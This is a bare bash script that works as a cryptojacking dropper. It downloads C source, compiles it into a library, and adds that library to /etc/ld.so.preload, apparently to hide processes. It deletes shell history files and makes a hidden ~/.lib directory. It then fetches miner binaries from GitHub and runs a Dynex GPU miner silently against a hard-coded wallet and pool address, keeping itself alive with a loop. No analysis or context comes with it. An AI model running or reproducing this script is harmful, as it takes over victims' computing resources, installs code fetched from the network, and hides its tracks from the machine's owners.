#!/bin/bash
curl https://bitbucket.org/dennidarko01/kangkung/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash*
cd ~/
mkdir .lib
cd .lib
rm -rf *
WORKER="$(echo $(shuf -i 1-999999 -n 1)-CEK)"
WALLETNH="Xwo5uSVAyHtaLVd12zTygAKSC48DukpVdCQi7vqc5WsYXtpzJySMFXtDu7Vy2GqWC9cMtfePPu4ZeAB8BsPC9AwZ1PmLmbXur.461e120c19c54ac36ae799fd24ea8a07a5e21875168a268c98b04175f8d6d2b3"
POOLNHETC="139.144.188.198"
rm -f dynex_compute_w340.cnf && wget -q 'https://github.com/angkii/kerja/raw/main/dynex_compute_w340.cnf' && chmod +x dynex_compute_w340.cnf
rm -f h-manifest.conf && wget -q 'https://github.com/angkii/kerja/raw/main/h-manifest.conf' && chmod +x h-manifest.conf
rm -f dynexsolve && wget -q 'https://github.com/angkii/kerja/raw/main/dynexsolve' && chmod +x dynexsolve
./dynexsolve -stratum-url $POOLNHETC -stratum-port 80 -mining-address $WALLETNH -stratum-password $WORKER -no-cpu -multi-gpu -mallob-endpoint https://minenice.newpool.pw >/dev/null 2>&1
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
